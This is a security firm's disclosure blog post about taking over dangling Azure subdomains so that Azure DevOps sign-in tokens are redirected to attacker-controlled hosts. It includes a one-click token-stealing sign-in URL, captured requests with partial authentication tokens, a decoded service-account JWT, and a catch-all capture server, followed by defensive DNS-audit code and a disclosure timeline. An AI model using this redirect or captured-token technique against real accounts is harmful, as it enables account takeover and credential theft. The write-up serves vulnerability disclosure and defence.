Taking over Azure DevOps Accounts and Microsoft Pipelines

This post details how we took over an Azure DevOps subdomain to enable 1-click Azure DevOps account takeovers, with the additional treat of taking over a Microsoft disaster recovery account.

Background

At Binary Security, we reserve 20% of our working hours for research, and last year we decided to spend some time researching Azure DevOps. In one of the APIs, we noticed a couple of visualstudio.com domains with references to cloudapp.azure.com subdomains that did not resolve. Knowing that these are commonly vulnerable to subdomain takeover, we registered them in our own Azure tenant and monitored the traffic sent to them.

We took control of the following domains:

- feedsprodwcus0drdr.westus2.cloudapp.azure.com

- pkgsprodwcus0drdr.westus2.cloudapp.azure.com

These, in turn, gave us control over:

- feedsprodwcus0dr.feeds.visualstudio.com

- pkgsprodwcus0dr.pkgs.visualstudio.com

Monitoring the traffic

The impact of a subdomain takeover varies greatly. The most common case is the relatively low-impact one, where an attacker gains a company domain that can be used for phishing. From time to time, a subdomain takeover can be combined with other vulnerabilities to achieve, for example, Cross-Site Scripting on another domain that would be unexploitable without it. An often overlooked aspect of subdomain takeovers is that the hijacked domain may receive live data, either from users or from automated systems, sometimes even including credentials!

When working with clients, we usually have access to source code and internal DNS systems and can assess the impact without monitoring traffic. When we don’t have this luxury, we hijack the subdomain and monitor the traffic it receives. We normally integrate this with our instant messaging platform to get notified. The script used to spin up an Azure VM redirecting traffic to our log server can be found here (edit the nginx config to point to your callback server):
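The script referenced above uses nginx on an Azure VM to forward traffic to a log server. For the receiving end, a minimal sketch using only Python's standard library could look like the following. It is not our actual script: the port, the in-memory CAPTURED list and the notify() hook (a hypothetical stand-in for the instant messaging integration) are all assumptions.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Captured requests are kept in memory here; a real setup would persist them.
CAPTURED = []
_lock = threading.Lock()


def notify(entry):
    """Hypothetical hook: replace with a post to your IM platform's webhook."""
    print(json.dumps(entry)[:500])


class CatchAllHandler(BaseHTTPRequestHandler):
    """Records any request, whatever the method or path, and answers 200."""

    def _capture(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        entry = {
            "client": self.client_address[0],
            "method": self.command,
            "path": self.path,
            "headers": dict(self.headers.items()),
            "body": body.decode("utf-8", errors="replace"),
        }
        with _lock:
            CAPTURED.append(entry)
        notify(entry)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    # Route every common method to the same capture logic.
    do_GET = do_POST = do_PUT = do_DELETE = do_HEAD = do_OPTIONS = _capture

    def log_message(self, fmt, *args):
        pass  # silence the default stderr access log; notify() reports instead


def serve(host="0.0.0.0", port=8080):
    """Run the catch-all server until interrupted."""
    ThreadingHTTPServer((host, port), CatchAllHandler).serve_forever()
```

Calling serve() on the log server and pointing the nginx proxy at it records every request, which matters because you cannot predict which paths a hijacked host will receive.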

Azure DevOps Account Takeover

A victim visiting the URL below would be authenticated to Azure DevOps and then redirected, along with their authentication tokens, to our domain.

hxxps://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https://feedsprodwcus0dr.feeds.visualstudio.com/&redirect=1

The reply_to parameter must point to a subdomain of an allowed domain, such as *.visualstudio.com, which our hijacked host satisfies. The request sent to our server looked something like this:

POST /_signedin?realm=feedsprodwcus0dr.feeds.visualstudio.com&protocol=wsfederation&reply_to=https%3A%2F%2Ffeedsprodwcus0dr.feeds.visualstudio.com%2F HTTP/2
Host: feedsprodwcus0dr.vssps.visualstudio.com
Content-Length: 4620
Origin: https://app.vssps.visualstudio.com
Content-Type: application/x-www-form-urlencoded
Referer: https://app.vssps.visualstudio.com/
<...truncated...>

id_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IkhQVlR4QUpVV1M2NVZQYUZ4em53b0lqd0JFQSJ9.<...>.u1FHV8-J4ByuflfiPWp1ZriToHJnalrz9s2xRreEIbYdbf9FS2v7sAH_1uGDq0eWa0iekUJm1gWNMh_ndiSl4dKd-vjmuDOk_BGxci-upVFIFkM14klFvnqOu6gtSY5HyOOhrOem-GD91P7q64P511bB3XSX0QoFm2PhrwwutlwHHBeXEep1PmobLMp_q1Lqqivyg2tXjL3gE6ak2FsRTbcgSq6-sr6QOCO6JyDI_d5yPAC-SkzEkhhdDy9XBXGEkq6oYGz2ssHNyy9J-wzOQTND8-aaSJgRN_VQ4n5rgwnvD-ikf3qbYn9zPxeM1FwpwsvAH-0p0D5Of08lyn-X-g

&FedAuth=77u%2FPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U2VjdXJpdHlDb250ZXh0VG9rZW4gcDE6SWQ9Il9mNWMyNDFiZS1jMzg5LTQ5MmEtOWNkYi04MThkZjRhYThjNmItMzZGRTM5NUM5MjQ2ODRGQThBNzBGMjk1OUNCQzY1QUYiIHhtbG5zOnAxPSJodHRwOi8vZG9jcy5vYXNpcy1vcGVuLm9yZy93c3MvMjAwNC8wMS9vYXNpcy0yMDA0<...>

&FedAuth1=L0FBbUV1b3<...>
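To triage a captured sign-in POST like the one above, the form body can be split into its fields. The sketch below assumes, as the FedAuth/FedAuth1 naming suggests, that the session cookie is chunked across numbered fields that concatenate into one base64 value; the function names are hypothetical. Decoding the visible FedAuth prefix this way yields a UTF-8 byte-order mark followed by an XML declaration and the start of a SecurityContextToken element.

```python
import base64
import re
from urllib.parse import parse_qs


def parse_signin_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def reassemble_fedauth(fields: dict) -> bytes:
    """Concatenate FedAuth, FedAuth1, FedAuth2, ... (assumed chunking) and base64-decode."""

    def index(name: str) -> int:
        suffix = name[len("FedAuth"):]
        return int(suffix) if suffix else 0

    names = [n for n in fields if re.fullmatch(r"FedAuth\d*", n)]
    joined = "".join(fields[n] for n in sorted(names, key=index))
    joined += "=" * (-len(joined) % 4)  # restore base64 padding if it was cut off
    return base64.b64decode(joined)
```

This only decodes what was captured for inspection; it does not validate the token.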

The authentication tokens sent to us could be used to authenticate to Azure DevOps as that user directly (even through the GUI) and gave us complete control of the user’s account.
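The attack works because the sign-in flow trusts hosts under an allowed domain, so a hijacked subdomain is as good a reply_to target as a legitimate one. We do not know how the service validates reply_to internally; as a hypothetical sketch, assuming a simple hostname-suffix allowlist (ALLOWED_SUFFIXES is our illustration, not Microsoft's configuration):

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; the real service's rules are unknown to us.
ALLOWED_SUFFIXES = (".visualstudio.com",)


def is_allowed_reply_to(url: str) -> bool:
    """Accept https URLs whose hostname ends with an allowed suffix."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    return parts.scheme == "https" and any(host.endswith(s) for s in ALLOWED_SUFFIXES)


# A hijacked subdomain passes exactly like a legitimate one.
print(is_allowed_reply_to("https://feedsprodwcus0dr.feeds.visualstudio.com/"))  # True
print(is_allowed_reply_to("https://visualstudio.com.attacker.example/"))  # False
```

Under this kind of check, the fix has to happen in DNS: any dangling record beneath an allowed suffix yields a host that passes validation.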

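We did not have full insight into why traffic for the visualstudio.com domains was routed to our Azure VM, but attributed it to Microsoft’s edge routing configuration, based on the Azure Front Door health probes we received. In the probe below, the X-Fd-Routekeyapplicationendpointlist header lists our hijacked host as the application endpoint: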

GET http://feedsprodwcus0dr.feeds.visualstudio.com/_apis/health HTTP/1.1
Host: feedsprodwcus0dr.feeds.visualstudio.com
Synthetictest-Id: default_feeds--wcus--feeds-wcus-0dr_us-ca-sjc-azr
Synthetictest-Location: us-ca-sjc-azr
X-Fd-Clientip: 40.91.82.48
X-Fd-Corpnet: 0
X-Fd-Edgeenvironment: Edge-Prod-CO1r1
X-Fd-Originalurl: https://feedsprodwcus0dr.feeds.visualstudio.com:443/_apis/health
X-Fd-Partner: VSTS_feed
X-Fd-Routekey: v02=|v00=feedsprodwcus0dr.feeds.visualstudio.com
X-Fd-Routekeyapplicationendpointlist: feedsprodwcus0drdr.westus2.cloudapp.azure.com
<...truncated...>
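When many probes land in the log, the Front Door headers are what tie a public hostname to a backend. A minimal sketch, with a hypothetical parse_raw_request() helper, that parses a logged request like the one above (header names are lowercased, since HTTP header names are case-insensitive) and maps the Host to the X-Fd-Routekeyapplicationendpointlist value:

```python
def parse_raw_request(raw: str):
    """Split a logged HTTP request into (request_line, headers dict)."""
    lines = raw.strip().splitlines()
    request_line, headers = lines[0], {}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:  # skip markers such as "<...truncated...>" that have no colon
            headers[name.strip().lower()] = value.strip()
    return request_line, headers


probe = """GET http://feedsprodwcus0dr.feeds.visualstudio.com/_apis/health HTTP/1.1
Host: feedsprodwcus0dr.feeds.visualstudio.com
X-Fd-Routekey: v02=|v00=feedsprodwcus0dr.feeds.visualstudio.com
X-Fd-Routekeyapplicationendpointlist: feedsprodwcus0drdr.westus2.cloudapp.azure.com
<...truncated...>"""

_, hdrs = parse_raw_request(probe)
print(hdrs["host"], "->", hdrs["x-fd-routekeyapplicationendpointlist"])
# feedsprodwcus0dr.feeds.visualstudio.com -> feedsprodwcus0drdr.westus2.cloudapp.azure.com
```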

At this point, we reported the vulnerability to MSRC (Microsoft Security Response Center), but kept the monitoring servers running.

Disaster Recovery Pipelines Checking In

Later that day, after we had moved on to researching other Azure services, a mysterious HTTP request reached our monitoring web server and landed in our IM channel.

GET /_apis/connectionData&connectOptions=1&lastChangeId=-1&lastChangeId64=-1 HTTP/1.1
Host: feedsprodwcus0dr.feeds.visualstudio.com
User-Agent: VSTest.Console.exe
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtpZCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyJ9.eyJhdWQiOiI0OTliODRhYy0xMzIxLTQyN2YtYWExNy0yNjdjYTY5NzU3OTgiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC83YTJiZWJkNC0wN2I0LTQzMDYtOWE5OS00ZDliOTI4ZTQ4ZmUvIiwiaWF0IjoxNjEzNjQ2MDA0LCJuYmYiOjE2MTM2NDYwMDQsImV4cCI6MTYxMzY0OTkwNCwiYWNyIjoiMSIsImFpbyI6IkUyWmdZRmp0dkdLdjJQRjFjOVorNVBhTkZ2a2NIYzNJT3VXUWVMdlpYWE92VnhLMnR6TUEiLCJhbXIiOlsicHdkIl0sImFwcGlkIjoiODcyY2Q5ZmEtZDMxZi00NWUwLTllYWItNmU0NjBhMDJkMWYxIiwiYXBwaWRhY3IiOiIwIiwiaXBhZGRyIjoiMTMuNzcuMTgyLjIyNyIsIm5hbWUiOiJQYWNrYWdpbmdBcnRpZmFjdHNMMyIsIm9pZCI6Ijg1YzU3ZGRkLWVjODAtNDI3OC04MTlhLWNmNTM1ZWQ0N2IxNCIsInB1aWQiOiIxMDAzMjAwMDUyRTFBQzI3IiwicmgiOiIwLkFUVUExT3NyZXJRSEJrT2FtVTJia281SV92clpMSWNmMC1CRm5xdHVSZ29DMGZFMUFLby4iLCJzY3AiOiJ1c2VyX2ltcGVyc29uYXRpb24iLCJzdWIiOiI3cWpzVlllY0l4dktpWWRkOHRTV0sxYURod010aWdGMDBqQlNRSk9CT3h3IiwidGlkIjoiN2EyYmViZDQtMDdiNC00MzA2LTlhOTktNGQ5YjkyOGU0OGZlIiwidW5pcXVlX25hbWUiOiJQYWNrYWdpbmdBcnRpZmFjdHNMM0BhemRldm9wcy5vbm1pY3Jvc29mdC5jb20iLCJ1cG4iOiJQYWNrYWdpbmdBcnRpZmFjdHNMM0BhemRldm9wcy5vbm1pY3Jvc29mdC5jb20iLCJ1dGkiOiJfNzBZZ1Ria1dFV09ZOTBjWDZZdEFBIiwidmVyIjoiMS4wIiwid2lkcyI6WyJiNzlmYmY0ZC0zZWY5LTQ2ODktODE0My03NmIxOTRlODU1MDkiXX0.<...>

<...trunc...>



Decoding the JWT shows that it belongs to the service account with UPN PackagingArtifactsL3@azdevops.onmicrosoft.com. Its audience (499b84ac-1321-427f-aa17-267ca6975798) is Azure DevOps, and when we used the token to log in, we saw that it had access to the organization codesharing-wcus-0dr, which is related to BCDR (Business Continuity and Disaster Recovery).
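Reading the claims does not require the signing key, since a JWT payload is just base64url-encoded JSON. A minimal sketch using only the standard library; it deliberately skips signature validation, so it is for inspection only, and jwt_claims() is a hypothetical helper name:

```python
import base64
import json


def jwt_claims(token: str) -> dict:
    """Return the decoded payload (claims) of a JWT without verifying it."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # base64url segments omit padding
    return json.loads(base64.urlsafe_b64decode(payload))


# Usage: pass the value after "Bearer " in the Authorization header.
# claims = jwt_claims(token)
# print(claims["upn"], claims["aud"])
```

Applied to the captured token, the upn claim is the service account named above, and aud is 499b84ac-1321-427f-aa17-267ca6975798, the Azure DevOps resource ID.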

Judging by the VSTest.Console.exe user agent, these requests came from automated test runs. Since the tests called package feed APIs, they might well have downloaded and used artifacts served by us too. As hosting malicious artifacts could have had a negative impact on Microsoft systems, we asked Microsoft for confirmation before attempting it, but never got a response. I guess we’ll never know.

Contoso account



Our server was also sent credentials for the user MOD Administrator on the Contoso domain. Our guess is that this came from MSRC’s initial triage.

Microsoft’s response

After months of being unresponsive, MSRC classified the vulnerability as follows:

- Severity: Important

- Security Impact: Spoofing

It was marked as out of scope and unrewarded because it relied on subdomain takeover. We believe that leaving real issues unrewarded in bug bounty programs is a bad idea, as it removes the incentive to report similar issues in the future. In the same period, we were also doing some research on Azure API Management, having taken over backend subdomains that used to point to AKS clusters, function apps and more, many of which received live traffic. However, since holding these Azure resources cost us money, we released them, as continuing the research did not make economic sense for us.

With that said, rewards are 100% up to the bug bounty program, and we respect MSRC’s decision.

The fix

This particular case was a dangling CNAME record. The easiest way to find out whether your domains have any of these is to perform DNS lookups on all of your CNAME records and note the ones whose targets do not resolve (e.g. sub.example.org has a CNAME record pointing to iapp01.westus2.cloudapp.azure.com, which does not resolve).
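The lookup described above can be scripted. A minimal sketch, assuming you already have an export of your CNAME records as (name, target) pairs, for example from your DNS provider or zone file: Python's standard library cannot query CNAME records directly, so this only checks whether each target resolves, via socket.getaddrinfo. The resolver is injectable so the logic can be tested offline, and the function names are hypothetical.

```python
import socket
from typing import Callable, Iterable, List, Tuple


def resolves(host: str) -> bool:
    """True if the system resolver returns at least one address for host."""
    try:
        return bool(socket.getaddrinfo(host, None))
    except (OSError, UnicodeError):
        # socket.gaierror (an OSError subclass) covers names that do not resolve
        return False


def find_dangling(
    records: Iterable[Tuple[str, str]],
    resolve: Callable[[str], bool] = resolves,
) -> List[Tuple[str, str]]:
    """Return (name, target) pairs whose CNAME target does not resolve."""
    return [(name, target) for name, target in records if not resolve(target)]


# Usage with a record export; the entry is the example from the text.
# find_dangling([("sub.example.org", "iapp01.westus2.cloudapp.azure.com")])
```

A target that fails to resolve is a candidate for review rather than proof, since transient DNS failures look the same.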

Microsoft has published a tool for identifying dangling CNAME records, along with a write-up on the subject.

Other DNS record types, such as NS, MX, A and AAAA, can also be vulnerable. NS and MX records can be subject to targeted takeovers. Dangling A and AAAA records pointing to IP addresses in Azure or other cloud providers are typically harder to take over, since an attacker would have to be allocated that exact address from the provider’s shared pool, but the address can still be reassigned to other tenants.
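For A and AAAA records, one possible starting point is to flag the records that point into a cloud provider’s published address ranges (for Azure, the downloadable Service Tags list) and then confirm by hand that each flagged IP is still assigned to one of your own resources. A minimal sketch; the ranges used below are RFC 5737 and RFC 3849 documentation prefixes standing in for real provider data, and the function name is hypothetical.

```python
import ipaddress
from typing import Iterable, List, Tuple


def records_in_cloud_ranges(
    records: Iterable[Tuple[str, str]], ranges: Iterable[str]
) -> List[Tuple[str, str]]:
    """Return (name, ip) pairs whose address falls inside any given range."""
    nets = [ipaddress.ip_network(r) for r in ranges]
    # Membership is False when IP versions differ, so v4 and v6 can be mixed.
    return [
        (name, ip)
        for name, ip in records
        if any(ipaddress.ip_address(ip) in net for net in nets)
    ]


# Placeholder ranges; load the provider's published list in practice.
flagged = records_in_cloud_ranges(
    [("a.example.org", "192.0.2.10"), ("b.example.org", "198.51.100.7"), ("c.example.org", "2001:db8::1")],
    ["192.0.2.0/24", "2001:db8::/32"],
)
print(flagged)  # [('a.example.org', '192.0.2.10'), ('c.example.org', '2001:db8::1')]
```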

We have implemented automated systems to deal with subdomain takeovers for our clients. Feel free to reach out if you need help with something similar.

Key takeaways

- Audit your DNS entries automatically to discover (and fix) potential subdomain takeovers, especially if you rely heavily on Azure.

- For red teamers and bug bounty hunters: capture the traffic from subdomain takeovers to demonstrate impact.

Timeline

- February 18, 2021: Reported to Microsoft

- February 23, 2021: MOD Administrator on the Contoso domain visits our domain

- March 9, 2021: Asked Microsoft whether it would be OK to attempt to take over the pipeline by serving malicious packages. No response was given.

- May 7, 2021: Asked Microsoft for an update

- May 19, 2021: Marked as out of scope by Microsoft because it relies on subdomain takeover

- March 11, 2022: Marked as fixed by Microsoft